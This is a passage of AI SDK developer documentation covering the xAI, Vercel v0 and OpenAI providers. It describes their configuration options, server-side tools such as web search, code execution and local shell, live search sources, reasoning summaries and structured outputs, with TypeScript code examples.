},
},
});
The following optional provider options are available for xAI chat models:
- reasoningEffort 'low' | 'medium' | 'high' - Reasoning effort for reasoning models.
- store boolean - Whether to store the generation. Defaults to true.
- previousResponseId string - The ID of the previous response. You can use it to continue a conversation. Defaults to undefined.
Responses API (Agentic Tools)
You can use the xAI Responses API with the xai.responses(modelId) factory method for server-side agentic tool calling. This enables the model to autonomously orchestrate tool calls and research on xAI's servers.
const model = xai.responses('grok-4-fast');
The Responses API provides server-side tools that the model can autonomously execute during its reasoning process:
- web_search: Real-time web search and page browsing
- x_search: Search X (Twitter) posts, users, and threads
- code_execution: Execute Python code for calculations and data analysis
Vision
The Responses API supports image input with vision models:
import fs from 'node:fs';
import { xai } from '@ai-sdk/xai';
import { generateText } from 'ai';
const { text } = await generateText({
model: xai.responses('grok-2-vision-1212'),
messages: [
{
role: 'user',
content: [
{ type: 'text', text: 'What do you see in this image?' },
{ type: 'image', image: fs.readFileSync('./image.png') },
],
},
],
});
Web Search Tool
The web search tool enables autonomous web research with optional domain filtering and image understanding:
import { xai } from '@ai-sdk/xai';
import { generateText } from 'ai';
const { text, sources } = await generateText({
model: xai.responses('grok-4-fast'),
prompt: 'What are the latest developments in AI?',
tools: {
web_search: xai.tools.webSearch({
allowedDomains: ['arxiv.org', 'openai.com'],
enableImageUnderstanding: true,
}),
},
});
console.log(text);
console.log('Citations:', sources);
Web Search Parameters
- allowedDomains string[] - Only search within specified domains (max 5). Cannot be used with excludedDomains.
- excludedDomains string[] - Exclude specified domains from search (max 5). Cannot be used with allowedDomains.
- enableImageUnderstanding boolean - Enable the model to view and analyze images found during search. Increases token usage.
X Search Tool
The X search tool enables searching X (Twitter) for posts, with filtering by handles and date ranges:
const { text, sources } = await generateText({
model: xai.responses('grok-4-fast'),
prompt: 'What are people saying about AI on X this week?',
tools: {
x_search: xai.tools.xSearch({
allowedXHandles: ['elonmusk', 'xai'],
fromDate: '2025-10-23',
toDate: '2025-10-30',
enableImageUnderstanding: true,
enableVideoUnderstanding: true,
}),
},
});
X Search Parameters
- allowedXHandles string[] - Only search posts from specified X handles (max 10). Cannot be used with excludedXHandles.
- excludedXHandles string[] - Exclude posts from specified X handles (max 10). Cannot be used with allowedXHandles.
- fromDate string - Start date for posts in ISO 8601 format (YYYY-MM-DD).
- toDate string - End date for posts in ISO 8601 format (YYYY-MM-DD).
- enableImageUnderstanding boolean - Enable the model to view and analyze images in X posts.
- enableVideoUnderstanding boolean - Enable the model to view and analyze videos in X posts.
Code Execution Tool
The code execution tool enables the model to write and execute Python code for calculations and data analysis:
const { text } = await generateText({
model: xai.responses('grok-4-fast'),
prompt:
'Calculate the compound interest for $10,000 at 5% annually for 10 years',
tools: {
code_execution: xai.tools.codeExecution(),
},
});
File Search Tool
xAI supports file search through OpenAI compatibility. You can use the OpenAI provider with xAI's base URL to search vector stores:
import { createOpenAI } from '@ai-sdk/openai';
import { streamText } from 'ai';
const openai = createOpenAI({
baseURL: 'https://api.x.ai/v1',
apiKey: process.env.XAI_API_KEY,
});
const result = streamText({
model: openai('grok-4'),
prompt: 'What documents do you have access to?',
tools: {
file_search: openai.tools.fileSearch({
vectorStoreIds: ['your-vector-store-id'],
maxNumResults: 5,
}),
},
});
Multiple Tools
You can combine multiple server-side tools for comprehensive research:
import { xai } from '@ai-sdk/xai';
import { streamText } from 'ai';
const { fullStream } = streamText({
model: xai.responses('grok-4-fast'),
prompt: 'Research AI safety developments and calculate risk metrics',
tools: {
web_search: xai.tools.webSearch(),
x_search: xai.tools.xSearch(),
code_execution: xai.tools.codeExecution(),
},
});
for await (const part of fullStream) {
if (part.type === 'text-delta') {
process.stdout.write(part.text);
} else if (part.type === 'source' && part.sourceType === 'url') {
console.log('\nSource:', part.url);
}
}
Provider Options
The Responses API supports the following provider options:
import { xai } from '@ai-sdk/xai';
import { generateText } from 'ai';
const result = await generateText({
model: xai.responses('grok-4-fast'),
providerOptions: {
xai: {
reasoningEffort: 'high',
},
},
// ...
});
The following provider options are available:
- reasoningEffort 'low' | 'high' - Control the reasoning effort for the model. Higher effort may produce more thorough results at the cost of increased latency and token usage.
Live Search
xAI models support Live Search functionality, allowing them to query real-time data from various sources and include it in responses with citations.
Basic Search
To enable search, specify searchParameters with a search mode:
import { xai } from '@ai-sdk/xai';
import { generateText } from 'ai';
const { text, sources } = await generateText({
model: xai('grok-3-latest'),
prompt: 'What are the latest developments in AI?',
providerOptions: {
xai: {
searchParameters: {
mode: 'auto', // 'auto', 'on', or 'off'
returnCitations: true,
maxSearchResults: 5,
},
},
},
});
console.log(text);
console.log('Sources:', sources);
Search Parameters
The following search parameters are available:
- mode 'auto' | 'on' | 'off' - Search mode preference:
  - 'auto' (default): Model decides whether to search
  - 'on': Always enables search
  - 'off': Disables search completely
- returnCitations boolean - Whether to return citations in the response. Defaults to true.
- fromDate string - Start date for search data in ISO 8601 format (YYYY-MM-DD). See the sketch after this list.
- toDate string - End date for search data in ISO 8601 format (YYYY-MM-DD).
- maxSearchResults number - Maximum number of search results to consider. Defaults to 20, max 50.
- sources Array<SearchSource> - Data sources to search from. Defaults to ["web", "x"] if not specified.
Search Sources
You can specify different types of data sources for search:
Web Search
const result = await generateText({
model: xai('grok-3-latest'),
prompt: 'Best ski resorts in Switzerland',
providerOptions: {
xai: {
searchParameters: {
mode: 'on',
sources: [
{
type: 'web',
country: 'CH', // ISO alpha-2 country code
allowedWebsites: ['ski.com', 'snow-forecast.com'],
safeSearch: true,
},
],
},
},
},
});
Web source parameters
- country string: ISO alpha-2 country code
- allowedWebsites string[]: Max 5 allowed websites
- excludedWebsites string[]: Max 5 excluded websites
- safeSearch boolean: Enable safe search (default: true)
X (Twitter) Search
const result = await generateText({
model: xai('grok-3-latest'),
prompt: 'Latest updates on Grok AI',
providerOptions: {
xai: {
searchParameters: {
mode: 'on',
sources: [
{
type: 'x',
includedXHandles: ['grok', 'xai'],
excludedXHandles: ['openai'],
postFavoriteCount: 10,
postViewCount: 100,
},
],
},
},
},
});
X source parameters
- includedXHandles string[]: Array of X handles to search (without @ symbol)
- excludedXHandles string[]: Array of X handles to exclude from search (without @ symbol)
- postFavoriteCount number: Minimum favorite count of the X posts to consider.
- postViewCount number: Minimum view count of the X posts to consider.
News Search
const result = await generateText({
model: xai('grok-3-latest'),
prompt: 'Recent tech industry news',
providerOptions: {
xai: {
searchParameters: {
mode: 'on',
sources: [
{
type: 'news',
country: 'US',
excludedWebsites: ['tabloid.com'],
safeSearch: true,
},
],
},
},
},
});
News source parameters
- country string: ISO alpha-2 country code
- excludedWebsites string[]: Max 5 excluded websites
- safeSearch boolean: Enable safe search (default: true)
RSS Feed Search
const result = await generateText({
model: xai('grok-3-latest'),
prompt: 'Latest status updates',
providerOptions: {
xai: {
searchParameters: {
mode: 'on',
sources: [
{
type: 'rss',
links: ['https://status.x.ai/feed.xml'],
},
],
},
},
},
});
RSS source parameters
- links string[]: Array of RSS feed URLs (max 1 currently supported)
Multiple Sources
You can combine multiple data sources in a single search:
const result = await generateText({
model: xai('grok-3-latest'),
prompt: 'Comprehensive overview of recent AI breakthroughs',
providerOptions: {
xai: {
searchParameters: {
mode: 'on',
returnCitations: true,
maxSearchResults: 15,
sources: [
{
type: 'web',
allowedWebsites: ['arxiv.org', 'openai.com'],
},
{
type: 'news',
country: 'US',
},
{
type: 'x',
includedXHandles: ['openai', 'deepmind'],
},
],
},
},
},
});
Sources and Citations
When search is enabled with returnCitations: true, the response includes sources that were used to generate the answer:
const { text, sources } = await generateText({
model: xai('grok-3-latest'),
prompt: 'What are the latest developments in AI?',
providerOptions: {
xai: {
searchParameters: {
mode: 'auto',
returnCitations: true,
},
},
},
});
// Access the sources used
for (const source of sources) {
if (source.sourceType === 'url') {
console.log('Source:', source.url);
}
}
Streaming with Search
Live Search works with streaming responses. Citations are included when the stream completes:
import { streamText } from 'ai';
const result = streamText({
model: xai('grok-3-latest'),
prompt: 'What has happened in tech recently?',
providerOptions: {
xai: {
searchParameters: {
mode: 'auto',
returnCitations: true,
},
},
},
});
for await (const textPart of result.textStream) {
process.stdout.write(textPart);
}
console.log('Sources:', await result.sources);
Model Capabilities
The xAI provider supports the following models: grok-4-fast-non-reasoning, grok-4-fast-reasoning, grok-code-fast-1, grok-4, grok-3, grok-3-latest, grok-3-fast, grok-3-fast-latest, grok-3-mini, grok-3-mini-latest, grok-3-mini-fast, grok-3-mini-fast-latest, grok-2, grok-2-latest, grok-2-1212, grok-2-vision, grok-2-vision-latest, grok-2-vision-1212, grok-beta, and grok-vision-beta. Per-model support for image input, object generation, tool usage, tool streaming, and reasoning varies; see the xAI documentation for the full capability matrix.
Image Models
You can create xAI image models using the .image() factory method. For more on image generation with the AI SDK see generateImage().
import { xai } from '@ai-sdk/xai';
import { experimental_generateImage as generateImage } from 'ai';
const { image } = await generateImage({
model: xai.image('grok-2-image'),
prompt: 'A futuristic cityscape at sunset',
});
Model-specific options
You can customize the image generation behavior with model-specific settings:
import { xai } from '@ai-sdk/xai';
import { experimental_generateImage as generateImage } from 'ai';
const { images } = await generateImage({
model: xai.image('grok-2-image'),
prompt: 'A futuristic cityscape at sunset',
maxImagesPerCall: 5, // Default is 10
n: 2, // Generate 2 images
});
Model Capabilities
| Model | Sizes | Notes |
|---|---|---|
| grok-2-image | 1024x768 (default) | xAI's text-to-image generation model, designed to create high-quality images from text prompts. It's trained on a diverse dataset and can generate images across various styles, subjects, and settings. |
title: Vercel
description: Learn how to use Vercel's v0 models with the AI SDK.
Vercel Provider
The Vercel provider gives you access to the v0 API, designed for building modern web applications. The v0 models support text and image inputs and provide fast streaming responses.
You can create your Vercel API key at v0.dev.
Features
- Framework aware completions: Evaluated on modern stacks like Next.js and Vercel
- Auto-fix: Identifies and corrects common coding issues during generation
- Quick edit: Streams inline edits as they're available
- Multimodal: Supports both text and image inputs
Setup
The Vercel provider is available via the @ai-sdk/vercel module. You can install it with:
pnpm add @ai-sdk/vercel
Provider Instance
You can import the default provider instance vercel from @ai-sdk/vercel:
import { vercel } from '@ai-sdk/vercel';
If you need a customized setup, you can import createVercel from @ai-sdk/vercel and create a provider instance with your settings:
import { createVercel } from '@ai-sdk/vercel';
const vercel = createVercel({
apiKey: process.env.VERCEL_API_KEY ?? '',
});
You can use the following optional settings to customize the Vercel provider instance:
- baseURL string - Use a different URL prefix for API calls. The default prefix is https://api.v0.dev/v1.
- apiKey string - API key that is being sent using the Authorization header. It defaults to the VERCEL_API_KEY environment variable.
- headers Record<string,string> - Custom headers to include in the requests.
- fetch (input: RequestInfo, init?: RequestInit) => Promise<Response> - Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.
Language Models
You can create language models using a provider instance. The first argument is the model ID, for example:
import { vercel } from '@ai-sdk/vercel';
import { generateText } from 'ai';
const { text } = await generateText({
model: vercel('v0-1.0-md'),
prompt: 'Create a Next.js AI chatbot',
});
Vercel language models can also be used in the streamText function (see AI SDK Core).
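A minimal streaming sketch:
import { vercel } from '@ai-sdk/vercel';
import { streamText } from 'ai';
const result = streamText({
  model: vercel('v0-1.5-md'),
  prompt: 'Create a Next.js AI chatbot',
});
for await (const textPart of result.textStream) {
  process.stdout.write(textPart);
}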
Models
v0-1.5-md
The v0-1.5-md model is for everyday tasks and UI generation.
v0-1.5-lg
The v0-1.5-lg model is for advanced thinking or reasoning.
v0-1.0-md (legacy)
The v0-1.0-md model is the legacy model served by the v0 API.
All v0 models have the following capabilities:
- Supports text and image inputs (multimodal)
- Supports function/tool calls
- Streaming responses with low latency
- Optimized for frontend and full-stack web development
Model Capabilities
As noted above, all three models (v0-1.5-md, v0-1.5-lg, and v0-1.0-md) support image input, tool usage, and tool streaming.
title: OpenAI
description: Learn how to use the OpenAI provider for the AI SDK.
OpenAI Provider
The OpenAI provider contains language model support for the OpenAI responses, chat, and completion APIs, as well as embedding model support for the OpenAI embeddings API.
Setup
The OpenAI provider is available in the @ai-sdk/openai module. You can install it with:
pnpm add @ai-sdk/openai
Provider Instance
You can import the default provider instance openai from @ai-sdk/openai:
import { openai } from '@ai-sdk/openai';
If you need a customized setup, you can import createOpenAI from @ai-sdk/openai and create a provider instance with your settings:
import { createOpenAI } from '@ai-sdk/openai';
const openai = createOpenAI({
// custom settings, e.g.
headers: {
'header-name': 'header-value',
},
});
You can use the following optional settings to customize the OpenAI provider instance:
- baseURL string - Use a different URL prefix for API calls, e.g. to use proxy servers. The default prefix is https://api.openai.com/v1.
- apiKey string - API key that is being sent using the Authorization header. It defaults to the OPENAI_API_KEY environment variable.
- name string - The provider name. You can set this when using OpenAI compatible providers to change the model provider property. Defaults to openai.
- organization string - OpenAI Organization.
- project string - OpenAI project.
- headers Record<string,string> - Custom headers to include in the requests.
- fetch (input: RequestInfo, init?: RequestInit) => Promise<Response> - Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.
Language Models
The OpenAI provider instance is a function that you can invoke to create a language model:
const model = openai('gpt-5');
It automatically selects the correct API based on the model id. You can also pass additional settings in the second argument:
const model = openai('gpt-5', {
// additional settings
});
The available options depend on the API that's automatically chosen for the model (see below).
If you want to explicitly select a specific model API, you can use .responses, .chat, or .completion.
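For example (the completion model id here is illustrative):
const responsesModel = openai.responses('gpt-5'); // Responses API (default)
const chatModel = openai.chat('gpt-5'); // Chat API
const completionModel = openai.completion('gpt-3.5-turbo-instruct'); // Completion API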
Example
You can use OpenAI language models to generate text with the generateText function:
import { openai } from '@ai-sdk/openai';
import { generateText } from 'ai';
const { text } = await generateText({
model: openai('gpt-5'),
prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});
OpenAI language models can also be used in the streamText, generateObject, and streamObject functions
(see AI SDK Core).
Responses Models
You can use the OpenAI responses API with the openai(modelId) or openai.responses(modelId) factory methods. It is the default API that is used by the OpenAI provider (since AI SDK 5).
const model = openai('gpt-5');
Further configuration can be done using OpenAI provider options.
You can validate the provider options using the OpenAIResponsesProviderOptions type.
import { openai, OpenAIResponsesProviderOptions } from '@ai-sdk/openai';
import { generateText } from 'ai';
const result = await generateText({
model: openai('gpt-5'), // or openai.responses('gpt-5')
providerOptions: {
openai: {
parallelToolCalls: false,
store: false,
user: 'user_123',
// ...
} satisfies OpenAIResponsesProviderOptions,
},
// ...
});
The following provider options are available:
- parallelToolCalls boolean - Whether to use parallel tool calls. Defaults to true.
- store boolean - Whether to store the generation. Defaults to true.
- maxToolCalls integer - The maximum number of total calls to built-in tools that can be processed in a response. This maximum applies across all built-in tool calls, not per individual tool. Any further attempts by the model to call a tool will be ignored.
- metadata Record<string, string> - Additional metadata to store with the generation.
- conversation string - The ID of the OpenAI Conversation to continue. You must create a conversation first via the OpenAI API. Cannot be used in conjunction with previousResponseId. Defaults to undefined.
- previousResponseId string - The ID of the previous response. You can use it to continue a conversation. Defaults to undefined.
- instructions string - Instructions for the model. They can be used to change the system or developer message when continuing a conversation using the previousResponseId option. Defaults to undefined.
- user string - A unique identifier representing your end-user, which can help OpenAI to monitor and detect abuse. Defaults to undefined.
- reasoningEffort 'none' | 'minimal' | 'low' | 'medium' | 'high' | 'xhigh' - Reasoning effort for reasoning models. Defaults to medium. If you use providerOptions to set the reasoningEffort option, this model setting will be ignored.
- reasoningSummary 'auto' | 'detailed' - Controls whether the model returns its reasoning process. Set to 'auto' for a condensed summary, 'detailed' for more comprehensive reasoning. Defaults to undefined (no reasoning summaries). When enabled, reasoning summaries appear in the stream as events with type 'reasoning' and in non-streaming responses within the reasoning field.
- strictJsonSchema boolean - Whether to use strict JSON schema validation. Defaults to false.
- serviceTier 'auto' | 'flex' | 'priority' | 'default' - Service tier for the request. Set to 'flex' for 50% cheaper processing at the cost of increased latency (available for o3, o4-mini, and gpt-5 models). Set to 'priority' for faster processing with Enterprise access (available for gpt-4, gpt-5, gpt-5-mini, o3, and o4-mini; gpt-5-nano is not supported). Defaults to 'auto'.
- textVerbosity 'low' | 'medium' | 'high' - Controls the verbosity of the model's response. Lower values result in more concise responses, while higher values result in more verbose responses. Defaults to 'medium'.
- include Array<string> - Specifies additional content to include in the response. Supported values: ['file_search_call.results'] for including file search results in responses, ['message.output_text.logprobs'] for logprobs. Defaults to undefined.
- truncation string - The truncation strategy to use for the model response.
  - auto: If the input to this response exceeds the model's context window size, the model will truncate the response to fit the context window by dropping items from the beginning of the conversation.
  - disabled (default): If the input size exceeds the context window size for a model, the request will fail with a 400 error.
- promptCacheKey string - A cache key for manual prompt caching control. Used by OpenAI to cache responses for similar requests to optimize your cache hit rates.
- promptCacheRetention 'in_memory' | '24h' - The retention policy for the prompt cache. Set to '24h' to enable extended prompt caching, which keeps cached prefixes active for up to 24 hours. Defaults to 'in_memory' for standard prompt caching. Note: '24h' is currently only available for the 5.1 series of models.
- safetyIdentifier string - A stable identifier used to help detect users of your application that may be violating OpenAI's usage policies. The ID should be a string that uniquely identifies each user.
The OpenAI responses provider also returns provider-specific metadata:
const { providerMetadata } = await generateText({
model: openai.responses('gpt-5'),
// ...
});
const openaiMetadata = providerMetadata?.openai;
The following OpenAI-specific metadata is returned:
- responseId string - The ID of the response. Can be used to continue a conversation.
- cachedPromptTokens number - The number of prompt tokens that were a cache hit.
- reasoningTokens number - The number of reasoning tokens that the model generated.
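Continuing the snippet above, a sketch that logs each field:
console.log('Response ID:', openaiMetadata?.responseId);
console.log('Cached prompt tokens:', openaiMetadata?.cachedPromptTokens);
console.log('Reasoning tokens:', openaiMetadata?.reasoningTokens);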
Reasoning Output
For reasoning models like gpt-5, you can enable reasoning summaries to see the model's thought process. Different models support different summarizers—for example, o4-mini supports detailed summaries. Set reasoningSummary: "auto" to automatically receive the richest level available.
import { openai } from '@ai-sdk/openai';
import { streamText } from 'ai';
const result = streamText({
model: openai('gpt-5'),
prompt: 'Tell me about the Mission burrito debate in San Francisco.',
providerOptions: {
openai: {
reasoningSummary: 'detailed', // 'auto' for condensed or 'detailed' for comprehensive
},
},
});
for await (const part of result.fullStream) {
if (part.type === 'reasoning') {
console.log(`Reasoning: ${part.text}`);
} else if (part.type === 'text-delta') {
process.stdout.write(part.text);
}
}
For non-streaming calls with generateText, the reasoning summaries are available in the reasoning field of the response:
import { openai } from '@ai-sdk/openai';
import { generateText } from 'ai';
const result = await generateText({
model: openai('gpt-5'),
prompt: 'Tell me about the Mission burrito debate in San Francisco.',
providerOptions: {
openai: {
reasoningSummary: 'auto',
},
},
});
console.log('Reasoning:', result.reasoning);
Learn more about reasoning summaries in the OpenAI documentation.
Verbosity Control
You can control the length and detail of model responses using the textVerbosity parameter:
import { openai } from '@ai-sdk/openai';
import { generateText } from 'ai';
const result = await generateText({
model: openai('gpt-5-mini'),
prompt: 'Write a poem about a boy and his first pet dog.',
providerOptions: {
openai: {
textVerbosity: 'low', // 'low' for concise, 'medium' (default), or 'high' for verbose
},
},
});
The textVerbosity parameter scales output length without changing the underlying prompt:
- 'low': Produces terse, minimal responses
- 'medium': Balanced detail (default)
- 'high': Verbose responses with comprehensive detail
Web Search Tool
The OpenAI responses API supports web search through the openai.tools.webSearch tool.
const result = await generateText({
model: openai('gpt-5'),
prompt: 'What happened in San Francisco last week?',
tools: {
web_search: openai.tools.webSearch({
// optional configuration:
externalWebAccess: true,
searchContextSize: 'high',
userLocation: {
type: 'approximate',
city: 'San Francisco',
region: 'California',
},
}),
},
// Force web search tool (optional):
toolChoice: { type: 'tool', toolName: 'web_search' },
});
// URL sources
const sources = result.sources;
For detailed information on configuration options see the OpenAI Web Search Tool documentation.
File Search Tool
The OpenAI responses API supports file search through the openai.tools.fileSearch tool.
You can force the use of the file search tool by setting the toolChoice parameter to { type: 'tool', toolName: 'file_search' }.
const result = await generateText({
model: openai('gpt-5'),
prompt: 'What does the document say about user authentication?',
tools: {
file_search: openai.tools.fileSearch({
vectorStoreIds: ['vs_123'],
// configuration below is optional:
maxNumResults: 5,
filters: {
key: 'author',
type: 'eq',
value: 'Jane Smith',
},
ranking: {
ranker: 'auto',
scoreThreshold: 0.5,
},
}),
},
providerOptions: {
openai: {
// optional: include results
include: ['file_search_call.results'],
} satisfies OpenAIResponsesProviderOptions,
},
});
Image Generation Tool
OpenAI's Responses API supports multi-modal image generation as a provider-defined tool.
Availability is restricted to specific models (for example, gpt-5 variants).
You can use the image tool with either generateText or streamText:
import { openai } from '@ai-sdk/openai';
import { generateText } from 'ai';
const result = await generateText({
model: openai('gpt-5'),
prompt:
'Generate an image of an echidna swimming across the Mozambique channel.',
tools: {
image_generation: openai.tools.imageGeneration({ outputFormat: 'webp' }),
},
});
for (const toolResult of result.staticToolResults) {
if (toolResult.toolName === 'image_generation') {
const base64Image = toolResult.output.result;
}
}
import { openai } from '@ai-sdk/openai';
import { streamText } from 'ai';
const result = streamText({
model: openai('gpt-5'),
prompt:
'Generate an image of an echidna swimming across the Mozambique channel.',
tools: {
image_generation: openai.tools.imageGeneration({
outputFormat: 'webp',
quality: 'low',
}),
},
});
for await (const part of result.fullStream) {
if (part.type === 'tool-result' && !part.dynamic) {
const base64Image = part.output.result;
}
}
For complete details on model availability, image quality controls, supported sizes, and tool-specific parameters, refer to the OpenAI documentation:
- Image generation overview and models: OpenAI Image Generation
- Image generation tool parameters (background, size, quality, format, etc.): Image Generation Tool Options
Code Interpreter Tool
The OpenAI responses API supports the code interpreter tool through the openai.tools.codeInterpreter tool.
This allows models to write and execute Python code.
import { openai } from '@ai-sdk/openai';
import { generateText } from 'ai';
const result = await generateText({
model: openai('gpt-5'),
prompt: 'Write and run Python code to calculate the factorial of 10',
tools: {
code_interpreter: openai.tools.codeInterpreter({
// optional configuration:
container: {
fileIds: ['file-123', 'file-456'], // optional file IDs to make available
},
}),
},
});
The code interpreter tool can be configured with:
- container: Either a container ID string or an object with fileIds to specify uploaded files that should be available to the code interpreter
Local Shell Tool
The OpenAI responses API supports the local shell tool for Codex models through the openai.tools.localShell tool.
Local shell is a tool that allows agents to run shell commands locally on a machine you or the user provides.
import { openai } from '@ai-sdk/openai';
import { generateText, stepCountIs } from 'ai';
const result = await generateText({
model: openai.responses('gpt-5-codex'),
tools: {
local_shell: openai.tools.localShell({
execute: async ({ action }) => {
// ... your implementation, e.g. sandbox access ...
return { output: stdout };
},
}),
},
prompt: 'List the files in my home directory.',
stopWhen: stepCountIs(2),
});
Image Inputs
The OpenAI Responses API supports image inputs for appropriate models. You can pass image files as part of the message content using the 'image' type:
const result = await generateText({
model: openai('gpt-5'),
messages: [
{
role: 'user',
content: [
{
type: 'text',
text: 'Please describe the image.',
},
{
type: 'image',
image: fs.readFileSync('./data/image.png'),
},
],
},
],
});
The model will have access to the image and will respond to questions about it.
The image should be passed using the image field.
You can also pass a file-id from the OpenAI Files API.
{
type: 'image',
image: 'file-8EFBcWHsQxZV7YGezBC1fq'
}
You can also pass the URL of an image.
{
type: 'image',
image: 'https://sample.edu/image.png',
}
PDF Inputs
The OpenAI Responses API supports reading PDF files.
You can pass PDF files as part of the message content using the file type:
const result = await generateText({
model: openai('gpt-5'),
messages: [
{
role: 'user',
content: [
{
type: 'text',
text: 'What is an embedding model?',
},
{
type: 'file',
data: fs.readFileSync('./data/ai.pdf'),
mediaType: 'application/pdf',
filename: 'ai.pdf', // optional
},
],
},
],
});
You can also pass a file-id from the OpenAI Files API.
{
type: 'file',
data: 'file-8EFBcWHsQxZV7YGezBC1fq',
mediaType: 'application/pdf',
}
You can also pass the URL of a PDF.
{
type: 'file',
data: 'https://sample.edu/example.pdf',
mediaType: 'application/pdf',
filename: 'ai.pdf', // optional
}
The model will have access to the contents of the PDF file and
respond to questions about it.
The PDF file should be passed using the data field,
and the mediaType should be set to 'application/pdf'.
Structured Outputs
The OpenAI Responses API supports structured outputs. You can enforce structured outputs using generateObject or streamObject, which expose a schema option. Additionally, you can pass a Zod or JSON Schema object to the experimental_output option when using generateText or streamText.
// Using generateObject
const result = await generateObject({
model: openai('gpt-4.1'),
schema: z.object({
recipe: z.object({
name: z.string(),
ingredients: z.array(
z.object({
name: z.string(),
amount: z.string(),
}),
),
steps: z.array(z.string()),
}),
}),
prompt: 'Generate a lasagna recipe.',
});
// Using generateText
const textResult = await generateText({
model: openai('gpt-4.1'),
prompt: 'How do I make a pizza?',
experimental_output: Output.object({
schema: z.object({
ingredients: z.array(z.string()),
steps: z.array(z.string()),
}),
}),
});
Chat Models
You can create models that call the OpenAI chat API using the .chat() factory method.
The first argument is the model id, e.g. gpt-4.
The OpenAI chat models support tool calls and some have multi-modal capabilities.
const model = openai.chat('gpt-5');
OpenAI chat models also support some model-specific provider options that are not part of the standard call settings.
You can pass them in the providerOptions argument:
import { openai, type OpenAIChatLanguageModelOptions } from '@ai-sdk/openai';
import { generateText } from 'ai';
const model = openai.chat('gpt-5');
await generateText({
model,
providerOptions: {
openai: {
logitBias: {
// optional likelihood for specific tokens
'50256': -100,
},
user: 'test-user', // optional unique user identifier
} satisfies OpenAIChatLanguageModelOptions,
},
});
The following optional provider options are available for OpenAI chat models:
- logitBias Record<number, number>
  Modifies the likelihood of specified tokens appearing in the completion. Accepts a JSON object that maps tokens (specified by their token ID in the GPT tokenizer) to an associated bias value from -100 to 100. You can use this tokenizer tool to convert text to token IDs. Mathematically, the bias is added to the logits generated by the model prior to sampling. The exact effect will vary per model, but values between -1 and 1 should decrease or increase likelihood of selection; values like -100 or 100 should result in a ban or exclusive selection of the relevant token. As an example, you can pass {"50256": -100} to prevent the token from being generated.
- logprobs boolean | number
  Return the log probabilities of the tokens. Including logprobs will increase the response size and can slow down response times. However, it can be useful to better understand how the model is behaving. Setting to true will return the log probabilities of the tokens that were generated. Setting to a number will return the log probabilities of the top n tokens that were generated.
- parallelToolCalls boolean
  Whether to enable parallel function calling during tool use. Defaults to true.
- user string
  A unique identifier representing your end-user, which can help OpenAI to monitor and detect abuse. Learn more.
- reasoningEffort 'minimal' | 'low' | 'medium' | 'high' | 'xhigh'
  Reasoning effort for reasoning models. Defaults to medium. If you use providerOptions to set the reasoningEffort option, this model setting will be ignored.
- structuredOutputs boolean
  Whether to use structured outputs. Defaults to true. When enabled, tool calls and object generation will be strict and follow the provided schema.
- maxCompletionTokens number
  Maximum number of completion tokens to generate. Useful for reasoning models.
- store boolean
  Whether to enable persistence in the Responses API.
- metadata Record<string, string>
  Metadata to associate with the request.
- prediction Record<string, any>
  Parameters for prediction mode.
- serviceTier 'auto' | 'flex' | 'priority' | 'default'
  Service tier for the request. Set to 'flex' for 50% cheaper processing at the cost of increased latency (available for o3, o4-mini, and gpt-5 models). Set to 'priority' for faster processing with Enterprise access (available for gpt-4, gpt-5, gpt-5-mini, o3, o4-mini; gpt-5-nano is not supported). Defaults to 'auto'. See the sketch after this list.
- strictJsonSchema boolean
  Whether to use strict JSON schema validation. Defaults to false.
- textVerbosity 'low' | 'medium' | 'high'
  Controls the verbosity of the model's responses. Lower values will result in more concise responses, while higher values will result in more verbose responses.
- promptCacheKey string
  A cache key for manual prompt caching control. Used by OpenAI to cache responses for similar requests to optimize your cache hit rates.
- promptCacheRetention 'in_memory' | '24h'
  The retention policy for the prompt cache. Set to '24h' to enable extended prompt caching, which keeps cached prefixes active for up to 24 hours. Defaults to 'in_memory' for standard prompt caching. Note: '24h' is currently only available for the 5.1 series of models.
- safetyIdentifier string
  A stable identifier used to help detect users of your application that may be violating OpenAI's usage policies. The IDs should be a string that uniquely identifies each user.
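For example, a minimal sketch of requesting the flex service tier:
import { openai } from '@ai-sdk/openai';
import { generateText } from 'ai';
const { text } = await generateText({
  model: openai.chat('o4-mini'),
  prompt: 'Summarize the plot of Hamlet in two sentences.',
  providerOptions: {
    openai: {
      serviceTier: 'flex', // cheaper processing at the cost of added latency
    },
  },
});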
Reasoning
OpenAI has introduced the o1, o3, and o4 series of reasoning models. Currently, o4-mini, o3, o3-mini, and o1 are available via both the chat and responses APIs. The models codex-mini-latest and computer-use-preview are available only via the responses API. Reasoning models currently only generate text, have several limitations, and are only supported using generateText and streamText.
They support additional settings and response metadata:
- You can use providerOptions to set the reasoningEffort option (or alternatively the reasoningEffort model setting), which determines the amount of reasoning the model performs.
- You can use the response providerMetadata to access the number of reasoning tokens that the model generated.
import { openai } from '@ai-sdk/openai';
import { generateText } from 'ai';
const { text, usage, providerMetadata } = await generateText({
model: openai.chat('gpt-5'),
prompt: 'Invent a new holiday and describe its traditions.',
providerOptions: {
openai: {
reasoningEffort: 'low',
},
},
});
console.log(text);
console.log('Usage:', {
...usage,
reasoningTokens: providerMetadata?.openai?.reasoningTokens,
});
Structured Outputs
Structured outputs are enabled by default.
You can disable them by setting the structuredOutputs option to false.
import { openai } from '@ai-sdk/openai';
import { generateObject } from 'ai';
import { z } from 'zod';
const result = await generateObject({
model: openai.chat('gpt-4o-2024-08-06'),
providerOptions: {
openai: {
structuredOutputs: false,
},
},
schemaName: 'recipe',
schemaDescription: 'A recipe for lasagna.',
schema: z.object({
name: z.string(),
ingredients: z.array(
z.object({
name: z.string(),
amount: z.string(),
}),
),
steps: z.array(z.string()),
}),
prompt: 'Generate a lasagna recipe.',
});
console.log(JSON.stringify(result.object, null, 2));
Structured outputs impose some schema restrictions. For example, optional schema properties are not supported: you need to change Zod .nullish() and .optional() to .nullable().
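For example, a minimal sketch of the change on a hypothetical schema:
import { z } from 'zod';
// not supported with structured outputs (optional property):
const draft = z.object({ name: z.string(), note: z.string().optional() });
// supported (nullable property):
const fixed = z.object({ name: z.string(), note: z.string().nullable() });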
Logprobs
OpenAI provides logprobs information for completion/chat models.
You can access it in the providerMetadata object.
import { openai } from '@ai-sdk/openai';
import { generateText } from 'ai';
const result = await generateText({
model: openai.chat('gpt-5'),
prompt: 'Write a vegetarian lasagna recipe for 4 people.',
providerOptions: {
openai: {
// this can also be a number,
// refer to logprobs provider options section for more
